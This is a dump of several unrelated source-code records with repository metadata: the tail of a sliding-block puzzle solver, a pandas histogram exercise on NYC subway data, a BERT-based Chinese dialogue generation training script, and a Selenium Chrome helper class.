#this would have removed a move that is an "undo" of the previous move, but it might remove a connection that would lead to a quicker solve
# if current_vertex not in self.vertex_dict[found_vertex]:
# print("Adding to vertex dict, this is not reverting move")
# self.vertex_dict[current_vertex].append(found_vertex)
# else:
# print("Not adding to vertex dict, this is reverting move")
#reset temp board
temp_board = copy.deepcopy(self.board_objects[current_vertex])
#check move down
if self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length'] + 1 > self.v_size:
print("Can't move down, boundary issue")
elif temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']][self.piece_objects[current_vertex][piece]['start_h']] != '.':
print("Can't move down, other piece in the way")
else:
print("Temporarily moving Down")
temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']] = '.'
temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']][self.piece_objects[current_vertex][piece]['start_h']] = piece
# print(temp_board)
self.print_board_simple(temp_board)
if temp_board not in self.board_objects.values():
print("This move down has not been found before")
next_vertex = len(self.board_objects.keys())
print(f"Next vertex: {next_vertex}")
self.board_objects[next_vertex] = temp_board
if self.debug_mode == 1:
print(self.board_objects)
self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
self.piece_objects[next_vertex][piece]['start_v'] += 1
#call recursion
self.vertex_dict[current_vertex].append(next_vertex)
self.vertex_dict[next_vertex] = []
if self.debug_mode == 1:
input("Stepping to next vertex\n>")
self.solve_puzzle(next_vertex)
#reset temp board on return
#add direction moved to this print
print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
self.print_board_simple(self.board_objects[current_vertex])
if self.debug_mode == 1:
input(">")
temp_board = copy.deepcopy(self.board_objects[current_vertex])
else:
#has to be in list format, grab 0th element which should be the only element
found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
print(found_vertex)
print(f"This move down has already been found at vertex: {found_vertex}")
self.vertex_dict[current_vertex].append(found_vertex)
#reset temp board
temp_board = copy.deepcopy(self.board_objects[current_vertex])
if self.debug_mode == 1:
input("Continue to next piece\n>")
if self.debug_mode == 1:
input(f"Reached end of solve puzzle function for vertex: {current_vertex}\n>")
def find_best_path_bfs(self):
solution_list = []
# print(f"Final vertex dict: {self.vertex_dict}\nExit points: {self.end_vertices}")
b_start = time.time()
for exit_point in self.end_vertices:
print(f"Checking exit point: {exit_point}")
paths = breadth_first_search.bfs_shortest_path(self.vertex_dict, 0, exit_point)
solution_list.append(paths)
b_end = time.time()
self.bfs_time = round((b_end - b_start),4)
num_solutions = len(solution_list)
input(f"Found {num_solutions} useful solutions, time elapsed finding all solutions: {self.bfs_time} seconds\nLooking for shortest solution..\n>")
# print("Looking for shortest solution..\nAll solutions:")
solution_list.sort(key=len)
shortest_len = len(solution_list[0])
for temp_solution in solution_list:
# print(temp_solution)
if len(temp_solution) == shortest_len:
self.final_solutions.append(temp_solution)
print("Shortest solutions")
print(self.final_solutions)
input(">")
#not used anymore
def find_best_path(self):
print(f"Final vertex dict: {self.vertex_dict}\nExit points: {self.end_vertices}\nPrinting all boards..")
for temp_vertex in self.board_objects.keys():
self.final_graph[temp_vertex] = set(self.vertex_dict[temp_vertex])
input(f"final_graph: \n{self.final_graph}\n>")
input(f"Adjacency graph\n>")
breadth_first_search.print_graph(self.final_graph)
input(f"Exit points: {self.end_vertices}\n>")
for exit_point in self.end_vertices:
print(f"Checking exit point: {exit_point}")
solution_list = list(breadth_first_search.dfs_paths(self.final_graph, 0, exit_point))
solution_list.sort(key=len)
print("All solutions:")
for temp_solution in solution_list:
print(temp_solution)
print("Final shortest solutions")
shortest_len = len(solution_list[0])
for short_solution in solution_list:
if len(short_solution) > shortest_len:
print("No more solutions")
break
print(f"Short solution: {short_solution}")
self.final_solutions.append(short_solution)
def print_final_solutions(self):
os.system("cls")
input("Printing final solutions\n>")
for solution in self.final_solutions:
for vertex in solution:
os.system("cls")
print("\n")
self.print_board_simple(self.board_objects[vertex])
input(">")
input("Finished this solution\n>")
print("Finished displaying the shortest solutions! Any one of these will win the game")
if __name__ == "__main__":
piece_objects = Board()
| [
"justingiardino13@gmail.com"
] | justingiardino13@gmail.com |
5d0a5af32df39acffb88df65ec1b23591c0e6994 | 9cb364e810abf5c1fd549fdf9c6feb0143f5a62b | /ps3/1-exploratory-data-analysis.py | c8ddf64251cbe2ff5fc1b3dc811899848bea58ee | [] | no_license | bharteesh/udacity-DAND-project2 | b8503856d17ab777571abad70a92f129476c36cf | 70ddbceb2ae8145f48364c83c97a75fe3a52ab15 | refs/heads/master | 2021-01-10T14:09:06.138972 | 2015-10-20T15:50:11 | 2015-10-20T15:50:11 | 44,265,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | import numpy as np
import pandas
import matplotlib.pyplot as plt
def entries_histogram(turnstile_weather):
'''
Before we perform any analysis, it might be useful to take a
look at the data we're hoping to analyze. More specifically, let's
examine the hourly entries in our NYC subway data and determine what
distribution the data follows. This data is stored in a dataframe
called turnstile_weather under the ['ENTRIESn_hourly'] column.
Let's plot two histograms on the same axes to show hourly
entries when raining vs. when not raining. Here's an example on how
to plot histograms with pandas and matplotlib:
turnstile_weather['column_to_graph'].hist()
Your histogram may look similar to bar graph in the instructor notes below.
You can read a bit about using matplotlib and pandas to plot histograms here:
http://pandas.pydata.org/pandas-docs/stable/visualization.html#histograms
You can see the information contained within the turnstile weather data here:
https://www.dropbox.com/s/meyki2wl9xfa7yk/turnstile_data_master_with_weather.csv
'''
plt.figure()
turnstile_weather['ENTRIESn_hourly'][turnstile_weather['rain'] == 0].hist(bins=200) # your code here to plot a historgram for hourly entries when it is raining
turnstile_weather['ENTRIESn_hourly'][turnstile_weather['rain'] == 1].hist(bins=200) # your code here to plot a historgram for hourly entries when it is not raining
plt.axis([0,6000,0,50000])
plt.xlabel('ENTRIESn_hourly')
plt.ylabel('Frequency')
plt.title('Histogram of ENTRIESn_hourly')
plt.legend(['No rain', 'Rain'])
return plt
| [
"bharteesh.kulkarni@ithaka.org"
] | bharteesh.kulkarni@ithaka.org |
2eeeadd45efe7599faffad71d6603bc53101fad8 | 055b99544c0b0b8f1388f40f1ad4298a52b9a9b4 | /200409_overfit.py | f4a375daa2eac44563727a4ff626fde5728e2a49 | [
"MIT"
] | permissive | youngzhou97qz/Beam-Search-Retrieval | dd5d16710229d7b71532b93ab7b4ddb29ba01a51 | 5e71d3f88c774af28adedbf2194d3b1b5d98a426 | refs/heads/master | 2022-11-24T08:59:55.469361 | 2020-07-29T07:14:24 | 2020-07-29T07:14:24 | 241,295,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,532 | py | import math
import random
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from transformers import *
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
pretrained_weights = 'bert-base-chinese'
tokenizer = BertTokenizer.from_pretrained(pretrained_weights) # tokenizer.vocab_size = 21128
token_id = tokenizer.convert_tokens_to_ids
mask_model = BertForMaskedLM.from_pretrained('bert-base-chinese').to(device)
mask_model.eval()
ser = 'dango'
# data part
# reading data
questions, answers, answer_ids = [], [], []
f = open('/home/'+ser+'/STC3/data/questions.txt','r',encoding='gbk')
lines = f.readlines()
for line in lines:
line = line.strip()
questions.append(line)
f.close()
f = open('/home/'+ser+'/STC3/data/answers.txt','r',encoding='gbk')
lines = f.readlines()
for line in lines:
line = line.strip()
answers.append(line)
f.close()
f = open('/home/'+ser+'/STC3/data/answers_id.txt','r',encoding='gbk')
lines = f.readlines()
for line in lines:
line = line.strip()
answer_ids.append(int(line))
f.close()
# judging chinese
def check_contain_chinese(check_str):
length = len(check_str)
count = 0
for ch in check_str:
if '\u4e00' <= ch <= '\u9fff':
count += 1
if count >= length // 3: # [泪]
return True
else:
return False
# delete sentences
i = len(questions)-1
while i >= 0:
if answer_ids[i] != 4:
questions.pop(i)
answers.pop(i)
elif check_contain_chinese(questions[i])==False or check_contain_chinese(answers[i])==False or len(questions[i])==0 or len(answers[i])==0:
questions.pop(i)
answers.pop(i)
i -= 1
# print('问答对:', len(questions)) # 1630292 anger: 184590
# standardization
import string
punc = string.punctuation + '!?。。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏.'
def del_punc_dup(text,slide_len,punc): # // 2
for j in range(slide_len, len(text)-slide_len+1):
if text[j:j+slide_len] == text[j-slide_len:j]:
for char in text[j:j+slide_len]:
if char in punc or (len(char)>2 and char[:2]=='##'):
return text[:j] + text[j+slide_len:]
break
return text
def del_char_dup(text,slide_len): # // 4
for j in range(3*slide_len, len(text)-slide_len+1):
if text[j:j+slide_len] == text[j-slide_len:j] and text[j-2*slide_len:j-slide_len] == text[j-slide_len:j] and text[j-2*slide_len:j-slide_len] == text[j-3*slide_len:j-2*slide_len]:
return text[:j] + text[j+slide_len:]
break
return text
def pre_process(text, punc): # 去除多余空格和'',保留一定数量的重复元素
for i in tqdm(range(len(text))):
text[i] = tokenizer.tokenize(text[i])
slide_len = len(text[i]) // 2
while slide_len >= 1:
origin_text = ''
while text[i] != origin_text:
origin_text = text[i]
text[i] = del_punc_dup(text[i],slide_len,punc)
slide_len -= 1
slide_len = len(text[i]) // 4
while slide_len >= 1:
origin_text = ''
while text[i] != origin_text:
origin_text = text[i]
text[i] = del_char_dup(text[i],slide_len)
slide_len -= 1
new = text[i][0]
for j in range(1,len(text[i])):
if len(text[i][j]) > 2 and text[i][j][:2] == '##':
new = new + text[i][j][2:]
else:
new = new + ' ' + text[i][j]
text[i] = new
return text
questions = pre_process(questions, punc)
answers = pre_process(answers, punc)
# answer vocabulary
import collections
def get_dict(answers):
char_answ = []
for i in range(len(answers)):
answers[i] = tokenizer.tokenize(answers[i])
for j in range(len(answers[i])):
char_answ.append(answers[i][j])
answ_dict = collections.Counter(char_answ)
# rest_answ = dict(filter(lambda x: (x[1] > 250 and (x[0] >= '\u4e00' and x[0] <= '\u9fff')) or (x[1] > 500 and (x[0] < '\u4e00' or x[0] > '\u9fff')), answ_dict.items()))
rest_answ = dict(filter(lambda x: (x[1] > 50 and (x[0] >= '\u4e00' and x[0] <= '\u9fff')) or (x[1] > 100 and (x[0] < '\u4e00' or x[0] > '\u9fff')), answ_dict.items()))
count = 2
for key in rest_answ.keys():
rest_answ[key] = count
count += 1
rest_answ['[SEP]'], rest_answ['[OOV]'] = 0, 1
return rest_answ
char2id = get_dict(answers)
id2char = {value:key for key, value in char2id.items()}
# print('词表数:', len(char2id)) # 2495 anger: 1918
# ids conversion
def id2id(ids, mode='bert2answ'):
if mode == 'bert2answ':
text = tokenizer.convert_ids_to_tokens([ids])[0]
if text in char2id.keys():
ids = char2id[text]
else:
ids = 1
elif mode == 'answ2bert':
text = id2char[ids]
ids = tokenizer.convert_tokens_to_ids(text)
return ids
# train & valid data
temp = [(ques, answ) for ques, answ in zip(questions, answers)]
temp.sort(key = lambda i: len(i[1]), reverse=True)
questions = [ques for ques, answ in temp]
answers = [answ for ques, answ in temp]
def data_loader(ques, answ, batch_size, max_len, model):
count = 0
while count < len(ques):
batch = []
size = min(batch_size, len(ques) - count)
for _ in range(size):
part1 = tokenizer.encode(prediction_replace(ques[count], max_len, model))
part2 = tokenizer.encode(answ[count])
truncate_tokens(part1, part2, max_len-2)
tokens = part1 + token_id(['[SEP]']) + part2 + token_id(['[SEP]'])
temp_tokens = part1 + token_id(['[SEP]'])
num = len(part1)+1
segment_ids = [0]*(num) + [1]
input_mask = [1]*(num+1)
masked_tokens, masked_pos = [], []
masked_tokens.append(id2id(tokens[num], mode='bert2answ'))
masked_pos.append(num)
n_pad = max_len - num - 1
tokens.extend([0]*(max_len - len(tokens)))
temp_tokens.extend([0]*(max_len - len(temp_tokens)))
segment_ids.extend([0]*n_pad)
input_mask.extend([0]*n_pad)
batch.append((tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, len(part2)+1))
count += 1
yield batch
# using BERT to replace characters
def prediction_replace(sentence, max_len, model, rate=0.1):
output_text = tokenizer.tokenize(sentence)
num = int(len(output_text)//((max_len//2-1)/((max_len//2-1)*rate+1)))
if num > 0:
random_sequence = list(range(len(output_text)))
random.shuffle(random_sequence)
count = 0
for index in random_sequence:
tokenized_text = tokenizer.tokenize(sentence)
reference_text = tokenized_text[index]
tokenized_text[index] = '[MASK]'
tokens_tensor = torch.tensor([tokenizer.convert_tokens_to_ids(tokenized_text)]).to(device)
segments_ids = torch.tensor([[0] * len(tokenized_text)]).to(device)
with torch.no_grad():
outputs = model(tokens_tensor, token_type_ids=segments_ids)
predicted_index = torch.argmax(outputs[0][0, index]).item()
predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]
if predicted_token != reference_text:
count += 1
output_text[index] = predicted_token
if count >= num:
break
return ''.join(output_text)
# keeping max_len
def truncate_tokens(tokens_a, tokens_b, max_len):
while True:
if len(tokens_a) + len(tokens_b) <= max_len:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
# 模型: bert 预训练 + transformer + generative
def gelu(x):
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
class Pre_trained(nn.Module):
def __init__(self, model=BertModel.from_pretrained(pretrained_weights)):
super().__init__()
self.model = model
for p in self.parameters():
p.requires_grad=False
def forward(self, input_ids, segment_ids):
input_ids = torch.tensor(input_ids).to(device)
segment_ids = torch.tensor(segment_ids).to(device)
self.model.eval()
with torch.no_grad():
hidden_states, _ = self.model(input_ids, token_type_ids=segment_ids)
return hidden_states
class MultiHeadedSelfAttention(nn.Module):
def __init__(self, dim=768, drop=0.1, heads=12):
super().__init__()
self.proj_q = nn.Linear(dim, dim)
self.proj_k = nn.Linear(dim, dim)
self.proj_v = nn.Linear(dim, dim)
self.drop = nn.Dropout(drop)
self.scores = None
self.n_heads = heads
def forward(self, x, mask):
q, k, v = self.proj_q(x), self.proj_k(x), self.proj_v(x)
q, k, v = (self.split_last(x, (self.n_heads, -1)).transpose(1, 2) for x in [q, k, v])
scores = q @ k.transpose(-2, -1) / np.sqrt(k.size(-1))
if mask is not None:
mask = mask[:, None, None, :].float()
scores -= 10000.0 * (1.0 - mask)
scores = self.drop(F.softmax(scores, dim=-1))
h = (scores @ v).transpose(1, 2).contiguous()
h = self.merge_last(h, 2)
self.scores = scores
return h
def split_last(self, x, shape):
shape = list(shape)
assert shape.count(-1) <= 1
if -1 in shape:
shape[shape.index(-1)] = int(x.size(-1) / -np.prod(shape))
return x.view(*x.size()[:-1], *shape)
def merge_last(self, x, n_dims):
s = x.size()
assert n_dims > 1 and n_dims < len(s)
return x.view(*s[:-n_dims], -1)
class PositionWiseFeedForward(nn.Module):
def __init__(self, dim=768, ffn=4):
super().__init__()
self.fc1 = nn.Linear(dim, dim*ffn)
self.fc2 = nn.Linear(dim*ffn, dim)
def forward(self, x):
return self.fc2(gelu(self.fc1(x)))
class BertLayer(nn.Module):
def __init__(self, share='none', norm='pre', dim=768, eps=1e-12, drop=0.1, n_layers=4):
super(BertLayer, self).__init__()
self.share = share
self.norm_pos = norm
self.norm1 = nn.LayerNorm(dim, eps=eps)
self.norm2 = nn.LayerNorm(dim, eps=eps)
self.drop1 = nn.Dropout(drop)
self.drop2 = nn.Dropout(drop)
if self.share == 'ffn':
self.attention = nn.ModuleList([MultiHeadedSelfAttention() for _ in range(n_layers)])
self.proj = nn.ModuleList([nn.Linear(dim, dim) for _ in range(n_layers)])
self.feedforward = PositionWiseFeedForward()
elif self.share == 'att':
self.attention = MultiHeadedSelfAttention()
self.proj = nn.Linear(dim, dim)
self.feedforward = nn.ModuleList([PositionWiseFeedForward() for _ in range(n_layers)])
elif self.share == 'all':
self.attention = MultiHeadedSelfAttention()
self.proj = nn.Linear(dim, dim)
self.feedforward = PositionWiseFeedForward()
elif self.share == 'none':
self.attention = nn.ModuleList([MultiHeadedSelfAttention() for _ in range(n_layers)])
self.proj = nn.ModuleList([nn.Linear(dim, dim) for _ in range(n_layers)])
self.feedforward = nn.ModuleList([PositionWiseFeedForward() for _ in range(n_layers)])
def forward(self, hidden_states, attention_mask, layer_num):
attention_mask = torch.tensor(attention_mask).to(device)
if self.norm_pos == 'pre':
if isinstance(self.attention, nn.ModuleList):
h = self.proj[layer_num](self.attention[layer_num](self.norm1(hidden_states), attention_mask))
else:
h = self.proj(self.attention(self.norm1(hidden_states), attention_mask))
out = hidden_states + self.drop1(h)
if isinstance(self.feedforward, nn.ModuleList):
h = self.feedforward[layer_num](self.norm1(out))
else:
h = self.feedforward(self.norm1(out))
out = out + self.drop2(h)
if self.norm_pos == 'post':
if isinstance(self.attention, nn.ModuleList):
h = self.proj[layer_num](self.attention[layer_num](hidden_states, attention_mask))
else:
h = self.proj(self.attention(hidden_states, attention_mask))
out = self.norm1(hidden_states + self.drop1(h))
if isinstance(self.feedforward, nn.ModuleList):
h = self.feedforward[layer_num](out)
else:
h = self.feedforward(out)
out = self.norm2(out + self.drop2(h))
return out
class Final_model(nn.Module):
def __init__(self, n_layers=4, dim=768, eps=1e-12, n_vocab=len(char2id)):
super().__init__()
self.pre_trained = Pre_trained()
self.n_layers = n_layers
self.blocks = BertLayer()
self.fc2 = nn.Linear(dim, dim)
self.norm = nn.LayerNorm(dim, eps=eps)
self.decoder = nn.Linear(dim, n_vocab)
def forward(self, input_ids, segment_ids, input_mask, masked_pos):
h = self.pre_trained(input_ids, segment_ids)
for i in range(self.n_layers):
h = self.blocks(h, input_mask, i)
masked_pos = torch.tensor(masked_pos)[:, :, None].expand(-1, -1, h.size(-1)).to(device)
h_masked = torch.gather(h, 1, masked_pos)
h_masked = self.decoder(self.norm(gelu(self.fc2(h_masked))))
return h_masked
# 训练
def epoch_train(model, iterator, optimizer, epoch, max_len, miu=4, clip=True): #词汇级
samp = miu/(miu-1+math.exp(epoch/miu))
print('teacher force rate: %3.3f'%samp)
model.train()
epoch_loss, count = 0, 0
iter_bar = tqdm(iterator, desc='Training')
for _, batch in enumerate(iter_bar): # in a batch
tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, resp_len = zip(*batch)
tokens, masked_tokens = torch.tensor(tokens).to(device), torch.tensor(masked_tokens).to(device)
for _ in range(min(max(resp_len), max_len//2-1)): # in a sequence
optimizer.zero_grad()
output = model(temp_tokens, segment_ids, input_mask, masked_pos)
loss = nn.CrossEntropyLoss(reduction='none')(output.transpose(1, 2), masked_tokens)
loss = loss.mean()
loss.backward()
if clip:
nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
count += 1
epoch_loss += loss.item()
iter_bar.set_description('loss=%3.3f'%loss.item())
temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
if max(masked_pos)[0] == max_len - 1:
break
if random.random() < samp:
for i in range(len(resp_len)):
temp_tokens[i][masked_pos[i][0]] = int(tokens[i][masked_pos[i][0]])
segment_ids[i][masked_pos[i][0]+1] = 1
input_mask[i][masked_pos[i][0]+1] = 1
masked_pos[i][0] += 1
masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
else:
model.eval()
with torch.no_grad():
pred = model(temp_tokens, segment_ids, input_mask, masked_pos)
model.train()
out = np.argsort(pred.cpu().detach().numpy())
out_list = []
for i in range(len(out)):
out_list.append(id2id(int(out[i][0][-1]), mode='answ2bert'))
for i in range(len(resp_len)):
temp_tokens[i][masked_pos[i][0]] = out_list[i]
segment_ids[i][masked_pos[i][0]+1] = 1
input_mask[i][masked_pos[i][0]+1] = 1
masked_pos[i][0] += 1
masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
return epoch_loss / count
def epoch_valid(model, iterator, max_len):
model.eval()
epoch_loss, count = 0, 0
with torch.no_grad():
iter_bar = tqdm(iterator, desc='Validation')
for _, batch in enumerate(iter_bar):
tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, resp_len = zip(*batch)
tokens, masked_tokens = torch.tensor(tokens).to(device), torch.tensor(masked_tokens).to(device)
for _ in range(min(max(resp_len), max_len//2-1)):
output = model(temp_tokens, segment_ids, input_mask, masked_pos)
loss = nn.CrossEntropyLoss(reduction='none')(output.transpose(1, 2), masked_tokens)
loss = loss.mean()
count += 1
epoch_loss += loss.item()
iter_bar.set_description('loss=%3.3f'%loss.item())
temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
if max(masked_pos)[0] == max_len - 1:
break
out = np.argsort(output.cpu().detach().numpy())
out_list = []
for i in range(len(out)):
out_list.append(id2id(int(out[i][0][-1]), mode='answ2bert'))
for i in range(len(resp_len)):
temp_tokens[i][masked_pos[i][0]] = out_list[i]
segment_ids[i][masked_pos[i][0]+1] = 1
input_mask[i][masked_pos[i][0]+1] = 1
masked_pos[i][0] += 1
masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
return epoch_loss / count
# BEAM Search
import copy
import heapq
from gensim.summarization import bm25
bm25_ques = bm25.BM25(questions)
bm25_answ = bm25.BM25(answers)
def epoch_test(ques, model_1, max_len, beam=3): # str list
ques = pre_process(ques, punc)
temp_tokens, segment_ids, input_mask, masked_pos, answers = [], [], [], [], []
for i in range(len(ques)):
token = tokenizer.encode(ques[i])[:max_len//2-1] + token_id(['[SEP]'])
num = len(token)
ids = [0]*(num) + [1]
mask = [1]*(num+1)
n_pad = max_len - num - 1
token.extend([0]*(max_len - len(token)))
ids.extend([0]*n_pad)
mask.extend([0]*n_pad)
for _ in range(beam):
temp_tokens.append(copy.deepcopy(token))
segment_ids.append(ids)
input_mask.append(mask)
masked_pos.append([num])
model_1.eval()
with torch.no_grad():
for _ in range(max_len//2-1):
if max(masked_pos)[0] == max_len - 1 or min(lists.count(token_id(['[SEP]'])[0]) for lists in temp_tokens) >= 2:
break
temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
output = model_1(temp_tokens, segment_ids, input_mask, masked_pos)
temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
out = np.argsort(output.cpu().detach().numpy())
scores = [0]*len(temp_tokens)
k_tokens, k_scores = [], []
for i in range(len(temp_tokens)):
for j in range(beam):
k_tokens.append(id2id(int(out[i][0][-1-j]), mode='answ2bert'))
k_scores.append(F.softmax(output.cpu().detach(), dim=-1).numpy()[i][0][int(out[i][0][-1-j])])
for i in range(0,len(k_tokens),beam*beam):
temp_list = [(score, token) for score, token in zip(k_scores[i:i+beam*beam], k_tokens[i:i+beam*beam])]
temp_list.sort(key = lambda i: i[0], reverse=True)
k_scores[i:i+beam*beam] = [score for score, token in temp_list]
k_tokens[i:i+beam*beam] = [token for score, token in temp_list]
for i in range(len(scores)):
count = 0
if i % beam != 0:
if scores[i] + k_scores[i//beam*beam*beam+i%beam+count] == scores[i-1]:
count += 1
scores[i] += k_scores[i//beam*beam*beam+i%beam+count]
temp_tokens[i][masked_pos[i][0]] = k_tokens[i//beam*beam*beam+i%beam+count]
else:
scores[i] += k_scores[i//beam*beam*beam+i%beam+count]
temp_tokens[i][masked_pos[i][0]] = k_tokens[i//beam*beam*beam+i%beam+count]
else:
scores[i] += k_scores[i*beam]
temp_tokens[i][masked_pos[i][0]] = k_tokens[i*beam]
segment_ids[i][masked_pos[i][0]+1] = 1
input_mask[i][masked_pos[i][0]+1] = 1
masked_pos[i][0] += 1
for i in range(len(ques)):
for j in range(beam):
temp_tokens[i*beam+j] = tokenizer.convert_ids_to_tokens(temp_tokens[i*beam+j])
start = temp_tokens[i*beam+j].index('[SEP]')
temp_tokens[i*beam+j] = temp_tokens[i*beam+j][start+1:]
if '[SEP]' in temp_tokens[i*beam+j]:
end = temp_tokens[i*beam+j].index('[SEP]')
temp_tokens[i*beam+j] = temp_tokens[i*beam+j][:end]
while '[PAD]' in temp_tokens[i*beam+j]:
temp_tokens[i*beam+j].remove('[PAD]')
while '[UNK]' in temp_tokens[i*beam+j]:
temp_tokens[i*beam+j].remove('[UNK]')
temp_tokens[i*beam+j] = ''.join(temp_tokens[i*beam+j])
answers.append(bm25(bm25_ques, bm25_answ, ques[i], temp_tokens[i*beam:(i+1)*beam]))
return answers
def bm25(bm25_ques, bm25_answ, question, answers, k=4):
ques_scores = bm25_ques.get_scores(question)
ques_max_k = heapq.nlargest(k, ques_scores)
scores, indexes = [], []
for i in range(len(ques_scores)):
if ques_scores[i] in ques_max_k:
indexes.append(i)
for i in range(len(answers)):
temp_score = 0
answ_scores = bm25_answ.get_scores(answers[i])
for index in indexes:
temp_score += ques_scores[index] * answ_scores[index]
scores.append(temp_score)
return answers[scores.index(max(scores))]
import os
def model_train(model, mask_model, ques_t, answ_t, test_ques, batch_size, max_len, learning_rate, epochs, load=False):
log_file = '/home/'+ser+'/STC3/result/log_anger.txt'
out_file = '/home/'+ser+'/STC3/result/out_anger.txt'
if load == True:
load_model(model, '/home/'+ser+'/STC3/result/7.844.pt')
start = 5
else:
with open(log_file, 'w') as log_f:
log_f.write('epoch, train_loss, valid_loss\n')
with open(out_file, 'w') as out_f:
out_f.write(str(test_ques) + '\n')
start = 0
optimizer = optim.Adam(model.parameters(),lr=learning_rate)
scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=2, verbose=True)
stop = 0
loss_list = []
for epoch in range(start, epochs):
r = random.randint(0,len(ques_t)-VALID)
train_iterator = data_loader(ques_t,answ_t, batch_size, max_len, mask_model)
valid_iterator = data_loader(ques_t[r:r+VALID],answ_t[r:r+VALID], batch_size, max_len, mask_model)
print('Epoch: ' + str(epoch+1))
train_loss = epoch_train(model, train_iterator, optimizer, epoch, max_len)
valid_loss = epoch_valid(model, valid_iterator, max_len)
scheduler.step(valid_loss)
loss_list.append(valid_loss)
with open(log_file, 'a') as log_f:
log_f.write('{epoch},{train_loss: 3.3f},{valid_loss: 3.3f}\n'.format(epoch=epoch+1, train_loss=train_loss, valid_loss=valid_loss))
if valid_loss == min(loss_list):
stop = 0
with open(out_file, 'a') as out_f:
out_f.write(str(valid_loss)[:5] + '\n')
out_f.write(str(epoch_test(test_ques, model, 64)) + '\n')
torch.save(model.state_dict(), os.path.join('/home/'+ser+'/STC3/result/', str(valid_loss)[:5]+'.pt'))
else:
stop += 1
if stop > 5: # patience**2+1
break
def load_model(model, model_file):
_model = model
state_dict = torch.load(model_file)
_model.load_state_dict(state_dict)
return _model
# 导出test 问句
import json
test_ques = []
with open('/home/'+ser+'/STC3/result/TUA1_1_TokushimaUniversity_base.json', 'r') as f:
for line in f:
a = json.loads(line)
for i in range(40):
test_ques.append(a[i][0][0])
VALID = 16384
model_train(Final_model().to(device), mask_model, questions, answers, test_ques, 256, 64, 0.0001, 999, load=True)
| [
"noreply@github.com"
] | youngzhou97qz.noreply@github.com |
2a2c4f282db59df7b5982790c4dc520ab0a9ae84 | d6d07a60a6acabe0652caddfb7b9f47392abfce0 | /umihico/scraping/chrome.py | 7dd997e8e34eb51a891a533bc729347f488070be | [] | no_license | umihico/umihico-pypi | 5d378d94753f94c45cea3c01a6e4c49b73183bd4 | f7de0e8df96b97d7ad4c92851cc742814db494c3 | refs/heads/master | 2022-03-10T08:39:09.456769 | 2018-11-10T06:18:21 | 2018-11-10T06:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py |
from selenium.webdriver import Chrome as originChrome
from selenium.webdriver import ChromeOptions
import itertools as _itertools
class Chrome(originChrome):
def _xpath(self, want_as_list, xpath):
if want_as_list:
elements = self.find_elements_by_xpath(
xpath) or anti_frame_xpath(self, xpath)
for e in elements:
edit_element(e)
return elements
else:
try:
element = self.find_element_by_xpath(xpath)
edit_element(element)
return element
except Exception as e:
elements = anti_frame_xpath(self, xpath)
if elements:
edit_element(elements[0])
return elements[0]
raise
def xpath(self, xpath):
return self._xpath(False, xpath)
def xpaths(self, xpath):
return self._xpath(True, xpath)
def click(self, xpath):
return self.xpath(xpath).click()
def send_keys(self, xpath, *keys):
return self.xpath(xpath).send_keys(*keys)
def exist(self, xpath):
return bool(len(self.xpaths(xpath)))
def text(self, xpath):
return self.xpath(xpath).text
def texts(self, xpath):
return [e.text for e in self.xpaths(xpath)]
def get_attribute(self, xpath, attribute):
self.xpath(xpath).get_attribute(attribute)
def get_attributes(self, xpath, attribute):
return [element.get_attribute(attribute) for element in self.xpaths(xpath)]
def anti_frame_xpath(chrome, xpath):
for frame_index in _itertools.count():
try:
chrome.switch_to.parent_frame()
except Exception as e:
pass
frames = chrome.find_elements_by_tag_name("frame")
if frame_index >= len(frames):
return []
chrome.switch_to_frame(frames[frame_index])
elements = chrome.find_elements_by_xpath(xpath)
if elements:
return elements
def gen_chtomeoptions():
options = ChromeOptions()
options.add_argument("--start-maximized")
options.add_argument("--disable-infobars")
return options
def edit_element(element):
def exist(self, xpath):
return bool(len(self.xpaths(xpath)))
element.xpath = element.find_element_by_xpath
element.xpaths = element.find_elements_by_xpath
element.exist = exist
| [
"umihico_dummy@users.noreply.github.com"
] | umihico_dummy@users.noreply.github.com |
